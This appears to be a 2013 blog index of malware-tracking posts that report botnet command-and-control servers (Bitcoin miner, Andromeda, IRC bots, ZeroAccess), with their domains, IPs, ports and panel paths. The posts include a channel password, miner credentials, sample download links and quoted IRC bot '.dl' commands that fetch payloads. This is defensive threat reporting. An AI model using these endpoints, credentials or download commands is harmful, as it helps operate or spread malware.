btcguild.com(Bitcoin Miner botnet hosted in United States Dallas Ebl Global Networks Inc.)

By Pig, April 29, 2013
Uncategorized

URL: hxxp://btcguild.com:8332/   hxxp://btcguild.com:8332 -u chakan_1 -p 123 hxxp://btcguild.com:8332 -u graskla_1 -p 123 DATA: POST / HTTP/1.1 Authorization: Basic Y2hha2FuXzE6MTIz Content-Length: 43 User-Agent: Ufasoft bitcoin-miner/0.20 (Windows NT XP 5.1.2600 Service Pack 3) Host: btcguild.com:8332 Cache-Control: no-cache {“method”: “getwork”, “params”: [], “id”:0} Actions Detected: Creates autorun records Injects code into other processes Patches system files Samples:Read more...

hardstunt.com (Andromeda http botnet proxied by cloudflare.com)

By I_Post_Ur_Info, April 28, 2013
Uncategorized

Resolved hardstunt.com to 108.162.198.113, 108.162.199.113 Server:  hardstunt.com Gate file:  /blob/image.php Hosting a botnet behind cloudflare seems like a bad idea.Lets see if I can get this blocked. EDIT: CloudFlare received your malware report dated April 28, 2013 regarding: hardstunt.com Please be aware CloudFlare is a network provider offering a reverse proxy, pass-through security service. WeRead more...

x01bkr2.biz (snk asper mod irc botnet hosted by buyurl.net, alibabahost.com)

By I_Post_Ur_Info, April 27, 2013
Uncategorized

Resolved x01bkr2.biz to 94.242.237.128, 37.221.170.208 Server:  x01bkr2.biz Port:  4723 Channel:  #o.O Topic for #o.O is: .dl hxxp://www.mediafire.com/download.php?dqr1p0wz8tpz9tz | .dl hxxp://www.mediafire.com/download.php?uqqhg3equchc7bd Topic for #o.O set by SpliT at Sat Apr 27 17:57:29 2013 The skype spreader downloads messages from hxxp://waxortraxe.org/icon.jpg Alternate domains: zr0x1b9.biz xkzykxb.biz xeyaz.biz Hosting infos: http://whois.domaintools.com/94.242.237.128 Hosting infos: http://whois.domaintools.com/37.221.170.208 EDIT: snk is now desperatelyRead more...

199.168.136.116(Andromeda hosted in United States Scranton Volumedrive)

By Pig, April 25, 2013
Uncategorized

Panel:hxxp://199.168.136.116/andro/image.php Plugins: hxxp://199.168.136.116/andro/r.pack hxxp://199.168.136.116/andro/s.pack hxxp://199.168.136.116/andro/f.pack Andromeda path need user and login :hxxp://199.168.136.116/andro/ Other: http://199.168.136.116/andro/fg.php?id=1880376902 sample:hxxp://199.168.136.116/andro/and.exe hosting infos: http://whois.domaintools.com/199.168.136.116

37.235.49.168 (Irc botnet hosted by edis.at)

By I_Post_Ur_Info, April 24, 2013
Uncategorized

Server:  37.235.49.168 Port:  443 Channel:  #test5 Channel password:  :godlol Topic for #test5 is: hacked by team whitehats Topic for #test5 set by Sabu at Tue Apr 23 15:14:29 2013 Example bot nick:  zwin-JJNEXJ|1952| Opers:  [Sabu] (ryan@dildos): ryan[Sabu] @#test5 @#opers @##fuckstamp #chats [Sabu] irc1.molten-wow.com :mw_customer_ircd[Sabu] is a Network Administrator[Sabu] is available for help.[Sabu] sysop[Sabu] idle 16:59:16,Read more...

xlotxdxtorwfmvuzfuvtspel.com(zeroaccess hosted in United States San Antonio Rackspace Cloud Servers)

By Pig, April 23, 2013
Uncategorized

Domain used: xlotxdxtorwfmvuzfuvtspel.com    166.78.144.80 C:WINDOWSsystem32rsaenh.dll systemroot C:RECYCLER C:RECYCLERS-1-5-21-1547161642-507921405-839522115-1004 C:RECYCLERS-1-5-21-1547161642-507921405-839522115-1004$e0da97a6dd053ef45a7e44d9077fa7d5 L U @ n ACPI#PNP0303#2&da1a3ff&0 d2cd4bfe C:RECYCLERS-1-5-18 C:RECYCLERS-1-5-18$e0da97a6dd053ef45a7e44d9077fa7d5 C:DOCUME~1UserLOCALS~1Temp1 (1).exe PIPEwkssvc C: sample here hosting infos: http://whois.domaintools.com/166.78.144.80